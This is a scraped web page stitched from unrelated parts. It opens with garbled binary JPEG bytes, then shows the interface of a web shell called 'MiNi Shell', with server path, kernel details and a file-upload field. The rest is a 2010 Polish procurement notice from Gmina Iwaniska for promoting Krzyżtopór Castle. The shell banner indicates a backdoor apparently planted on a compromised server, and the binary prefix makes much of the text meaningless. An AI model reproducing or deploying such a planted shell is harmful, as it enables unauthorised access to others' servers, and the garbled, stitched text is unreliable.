JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100213/30487-N-2010.html

<p class="kh_header"><b>Iwaniska: Świadczenie usług promocyjnych oraz opracowanie, druk i dostawę materia-łów promocyjnych w celu promocji Zamku Krzyżtopór w Ujeździe w ramach projektu p.n. Zamek Krzyżtopór markowym produktem turystycznym
  województwa  świętokrzyskiego</b><br>
<b>Numer ogłoszenia: 30487 - 2010; data zamieszczenia: 13.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwaniska , ul. Rynek 3, 28-570 Iwaniska, woj. świętokrzyskie, tel. 015 8601254, faks 015 8601240.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług promocyjnych oraz opracowanie, druk i dostawę materia-łów promocyjnych w celu promocji Zamku Krzyżtopór w Ujeździe w ramach projektu p.n. Zamek Krzyżtopór markowym produktem turystycznym
  województwa  świętokrzyskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług promocyjnych oraz opracowanie, druk i dostawę materia-łów promocyjnych w celu promocji Zamku Krzyżtopór w Ujeździe w ramach projektu p.n. Zamek Krzyżtopór markowym produktem turystycznym  województwa  świętokrzyskiego

1.	
Przedmiot zamówienia obejmuje w zakresie;
1.1.	świadczenia usług promocyjnych:
a - wykonanie hasła promocyjnego i logotypu,( opracowując projekty tych materiałów)              b  - opracowanie i opublikowanie w języku angielskim reklamy w gazecie 
   TRAVELER NATIONAL GEOGRAPHIC jednej edycji ( emisji) reklamy Zamku,
c  -  opracowanie i opublikowanie w języku polskim reklamy w gazecie 
   POZNAJ SWÓJ KRAJ  jednej edycji ( emisji) reklamy Zamku,
d  -  opracowanie i opublikowanie w języku polskim reklamy w gazecie 
   ECHO DNIA - WYDANIE ŚWIETOKRZYSKIE jednej edycji ( emisji) reklamy Zamku, - 
e  -  opracowanie i opublikowanie w języku polskim reklamy w gazecie 
    GAZETA WYBORCZA - DODATEK TURYSTYKA jednej edycji ( emisji) reklamy 
    Zamku, 
f  - opracowanie i opublikowanie w języku polskim reklamy w gazecie 
   ECHO DNIA - WYDANIE ŚWIETOKRZYSKIE jednej edycji ( emisji) reklamy Zamku 
    dotyczącej turnieju rycerskiego w roku 2010,
g - opracowanie i opublikowanie w języku polskim reklamy w gazecie 
   ECHO DNIA - WYDANIE ŚWIETOKRZYSKIE  jednej edycji ( emisji) reklamy Zamku 
    dotyczącej turnieju rycerskiego w roku 2011,
h  - opracowanie i wdrożenie oprogramowania w języku polskim i w języku angielskim multimedialnej prezentacji interaktywnej w zakresie prezentacji zamku i okolic w ramach serwisu http: krzyztopor.org.pl,
i  - opracowanie i opublikowanie ( wykupienie) 4 cykli po 1000 odsłon reklamy Zamku w sieci Internet w portalu:
    -  Gazety Wyborczej Turystyka
    -  Echa Dnia Turystyka,
    -  Onet.pl Podróże,
j  - opracowanie i opublikowanie ( wykupienie) reklamy Zamku w sieci Internet w portalu zagranicznym po uzgodnieniu z Zamawiającym,
k  - utworzenie przynajmniej dwóch kont na serwisach społecznościowych i zamieszcza-nie na nich ważnych informacji przez okres 6 miesięcy, w okresie realizacji przedmiotu zamówienia, w terminie wyznaczonym przez Zamawiającego,
l  - opracowywanie i wysyłanie informacji dotyczących Zamku do serwisów turystycznych, prowadzących kalendarze imprez, zbierających darmowo informacje, przez okres 6 mie-sięcy, w okresie realizacji przedmiotu zamówienia, w terminie wyznaczonym przez Za-mawiającego,

Opracowując projekty ww materiałów, Wykonawca przygotuje je w wersji elektronicznej na nośniku DVD do oceny Zamawiającego w 3 wersjach zgodnie z wymogami dla po-szczególnych rodzajów materiałów promocyjnych. 
 ( nie dotyczy pkt. lit. h, k i l).       

1.2.	Opracowanie, druk i dostawa materiałów promocyjnych:

a  - przewodnika w formacie B5 w nakładzie w ilości 500 szt.,
b  - albumu fotograficznego format A 4 w nakładzie w ilości 500 szt.;
c  - mapa Zamku Krzyżtopór format A 3 w nakładzie 100 szt.,
d  - pocztówki format karty pocztowej  w nakładzie 2000 szt.;
e  - plakat reklamowy - turniej rycerski w roku 2010, format A 2 nakład 500 szt., wraz z 
      ekspozycją w miejscowościach wymienionych w szczegółowym opisie przedmiotu 
      zamówienia. Cena oferty w zakresie tego przedmiotu zamówienia musi uwzględniać 
      koszt wynajmu nośnika, montażu i demontażu plakatu i ewentualnej wymiany w 
      przypadku jego zniszczenia.
f  - plakat reklamowy - turniej rycerski w roku 2011, format A 2 nakład 500 szt., wraz z 
     ekspozycją w miejscowościach wymienionych w szczegółowym opisie przedmiotu 
     zamówienia, Cena oferty w zakresie tego przedmiotu zamówienia musi uwzględniać 
     koszt wynajmu nośnika, montażu i demontażu plakatu i ewentualnej wymiany w 
     przypadku jego zniszczenia.

Opracowując projekty ww materiałów, Wykonawca przygotuje je w wersji elektronicznej na nośniku DVD do oceny Zamawiającego w 3 wersjach zgodnie z wymogami dla po-szczególnych rodzajów materiałów promocyjnych. 
 
1.3.	Opracowanie, druk (wykonanie) i ekspozycja(ustawienie ):

a  - tablic dojazdowych w ilości 3 sztuk, format 300x200 cm w miejscach uzgodnionych z Zamawiającym na następujących warunkach:

- zakres obejmuje także uzyskanie odpowiedniej zgody wymaganej stosownymi przepi-sami dla ustawienia tablic dojazdowych wraz z opłatami i kosztami takiego ustawienia oraz uzyskania stosownych zezwoleń. Wykonawca musi uwzględnić te koszty w cenie dla tego zakresu przedmiotu zamówienia. (wszelkie formalności po stronie Wykonawcy).
 - w terminie 30 dni od daty zawarcia umowy Wykonawca przedstawi propozycję lokali-zacji tablic oraz okolicę w której przewiduje się ich ustawienie i przedstawi w wersji elek-tronicznej dokumentację fotograficzną w tym zakresie.

b  - tablicy informacyjnej na terenie Zamku Krzyżtopór - 1 szt. o wymiarach 150x100 cm, wraz z kosztem montażu ( ustawienia).

c  - tabliczek informacyjnych w ilości 15 sztuk o wymiarach 15x30 cm na terenie Zamku Krzyżtopór, wraz z kosztem montażu (zamontowania),

d   - billboardów o wymiarach 4x6 m w ilości 4 sztuk eksponowanych na terenie woje-wództwa świętokrzyskiego w okresie  do dnia  10 czerwca 2011 r  na następujących wa-runkach:
- Zamawiający nie wymaga, aby Wykonawca był właścicielem nośnika, może być jego  najemcą, podnajemcą, dzierżawcą czy władającym na jakiejkolwiek innej podstawie prawnej. 
-Wybór operatora reklamy zewnętrznej oraz zakup wybranych lokalizacji - zgodnie z wy-tycznymi Zamawiającego (wszelkie formalności po stronie Wykonawcy).   
- w terminie 30 dni od daty zawarcia umowy Wykonawca przedstawi propozycję lokaliza-cji nośników oraz okolicy w których one się znajdują i przedstawi w wersji elektronicznej dokumentację fotograficzną w tym zakresie,
- Wykonawca zobowiązany będzie do przeprowadzania bieżącej kontroli w okresie eks-ponowania billboardów jakości wyeksponowanych plakatów reklamowych. W przypadku zniszczenia lub uszkodzenia wyklejonych materiałów Wykonawca na swój koszt dokona niezwłocznie ich wymiany na nowe,
- koszt zużycia energii elektrycznej do oświetlenia materiału w okresie użytkowania no-śnika obciąża Wykonawcę  
1.4.	-Wykonawca musi uwzględnić w cenie oferty dla tego zakresu przedmiotu zamówienia - oprócz opracowania i druku billboardów, powyższe koszty w tym także wynajem nośnika, koszt montażu i demontażu tych materiałów reklamowych. 
 
Opracowując projekty ww materiały, Wykonawca przygotuje je w wersji elektronicznej na nośniku DVD do oceny Zamawiającego w 3 wersjach zgodnie z wymogami dla poszcze-gólnych rodzajów materiałów promocyjnych. 

1.5.	zorganizowanie i przeprowadzenie turnieju rycerskiego:

1.5.1.	- w ostatniej dekadzie maja 2010r.,
1.5.2.	- w ostatniej dekadzie maja 2011r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 22.46.20.00-6, 72.21.25.20-0, 79.82.25.00-7, 79.82.30.00-9, 39.29.41.00-0, 79.95.21.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	na potwierdzenie spełnienia warunków, o których mowa w art. 22 ust. 1 Pzp wykonawca składa wraz z ofertą oświadczenie wykonawcy o spełnianiu warunków we wzorze okre-ślonym w załączniku nr  3 do SIWZ.
W przypadku Wykonawców składających wspólnie ofertę, składane jest jedno oświad-czenie, które podpisuje ustanowiony pełnomocnik, jeżeli wynika to z udzielonego pełno-mocnictwa, lub wszyscy Wykonawcy składający wspólnie ofertę.
 1.3.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do reje-stru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 Pzp. ( ra-mach oświadczenia, o którym mowa w powyższym pkt. 1.2 złożonego odrębnie przez każdą osobę fizyczną ( w tym odrębnie przez każdego wspólnika spółki cywilnej ( przed-siębiorcy ) - nie dotyczy spółek jawnych ujawnionych we właściwych rejestrach - np. w Krajowym Rejestrze Sądowym, w tym przypadku Wykonawca składa jedno oświadcze-nie, o którym mowa w ww pkt. 1.2 w imieniu spółki jawnej.    
Jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia dokument ten, musi złożyć każdy z Wykonawców - oddzielnie.
 Wymagana forma dokumentu - oryginał lub kopia poświadczona za zgodność z orygina-łem przez Wykonawcę lub upoważnionego pełnomocnika dla aktualnego odpisu z wła-ściwego rejestru. Zaś w przypadku osób fizycznych oświadczenie, o którym mowa w ww pkt. 1.2 należy złożyć w formie oryginału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1.	wykonania w ciągu ostatnich trzech lat przed dniem wszczęcia niniejszego postę-powania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krót-szy - w tym okresie, Wykonawca zrealizował:
3.1.1.	 zamówienie(a) na wykonanie i dostawę materiałów promocyjnych w dowol-nym  zakresie rzeczowym wymienionym w rozdz. II pkt. 1.2 SIWZ, na kwotę mi-nimum 10 000 zł brutto lub kilka zamówień o łącznej wartości minimum 10 000 zł brutto ( w tym przypadku do zsumowania można wziąć pod uwagę maksymalnie pięć zamówień), 
3.1.2.	- jedno zamówienie na opracowanie billboardów, o których mowa w rozdz. II pkt. 1.3 lit. d z montażem na nośnikach,
3.1.3.	- jedno zamówienie na opracowanie i wdrożenie prezentacji multimedialnej, o której mowa w rozdz. II pkt. 1.1 lit. h w formacie umożliwiającym jej umieszczenie i funkcjonowanie na stronie WWW, co najmniej w dwóch wersjach językowych,
3.1.4.	- jedno zamówienie w zakresie organizacji i przeprowadzenia imprezy kultural-nej o charakterze historycznym.
3.1.5.	Wartość zrealizowanych usług - pkt. 3.1.2 do 3.1.4 ( wynagrodzenia brutto Wykonawcy) wynosiła co najmniej 120.000 zł 
3.1.6.	Zamawiający nie wymaga, by usługi określone w pkt. 3.1.2 do 3.1.4 były wy-konane w ramach jednego zamówienia. W takim przypadku wartość wszystkich wymienionych zamówień łącznie powinna spełniać wymóg kwoty 120.000 zł , pod uwagę nie będą brane wartości usług nie odpowiadających swoim zakresem wymaganiom Zamawiającego.   

2.1.	sporządzony przez Wykonawcę Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i posiadania doświadczenia  we wzorze stanowią-cym załącznik nr 5 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w rozdz. VIII pkt. 3.1.1- 3.1.4.
W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie.
Wymagana forma dokumentów oryginał.
 
2.2.	dokumenty potwierdzające, że usługi przedstawione w wykazie  zrealizowanych zamó-wieńzostały wykonane należycie, np. referencje
Wymagana forma dokumentów oryginał lub kopia poświadczona za  zgodność z orygina-łem  przez Wykonawcę lub upoważnionego pełnomocnika,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// iwaniska.pl/bip.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http:// iwaniska.pl/bip.
Instytucja Kultury Zamek Krzyżtopór w Ujeździe
Ujazd 73
27 - 570 Iwaniska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2010 godzina 11:00, miejsce: Instytucja Kultury Zamek Krzyżtopór w Ujeździe
Ujazd 73
27-570  Iwaniska
Pokój (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 09.04.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie  współfinansowane przez Unię Europejską z Europejskiego Funduszu 
Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa 
Świętokrzyskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com